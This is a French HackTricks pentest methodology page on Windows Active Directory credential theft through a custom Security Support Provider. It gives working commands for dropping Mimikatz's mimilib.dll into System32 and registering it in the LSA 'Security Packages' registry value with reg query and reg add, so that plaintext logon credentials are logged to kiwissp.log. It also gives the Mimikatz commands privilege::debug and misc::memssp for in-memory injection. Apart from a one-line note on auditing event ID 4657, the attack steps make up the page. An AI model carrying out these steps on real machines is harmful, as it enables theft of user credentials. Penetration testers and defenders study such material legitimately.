hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md
2023-06-03 13:10:46 +00:00

3.2 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

SSP personnalisé

Apprenez ce qu'est un SSP (Security Support Provider) ici.
Vous pouvez créer votre propre SSP pour capturer en clair les informations d'identification utilisées pour accéder à la machine.

Mimilib

Vous pouvez utiliser le binaire mimilib.dll fourni par Mimikatz. Cela enregistrera dans un fichier toutes les informations d'identification en clair.
Déposez la dll dans C:\Windows\System32\
Obtenez une liste des packages de sécurité LSA existants:

{% code title="attaquant@cible" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Ajoutez mimilib.dll à la liste des fournisseurs de support de sécurité (Security Packages) :

PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Et après un redémarrage, toutes les informations d'identification peuvent être trouvées en clair dans C:\Windows\System32\kiwissp.log

En mémoire

Vous pouvez également injecter cela en mémoire directement en utilisant Mimikatz (notez que cela peut être un peu instable / ne pas fonctionner):

privilege::debug
misc::memssp

Cela ne survivra pas aux redémarrages.

Atténuation

ID d'événement 4657 - Audit de la création/modification de HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages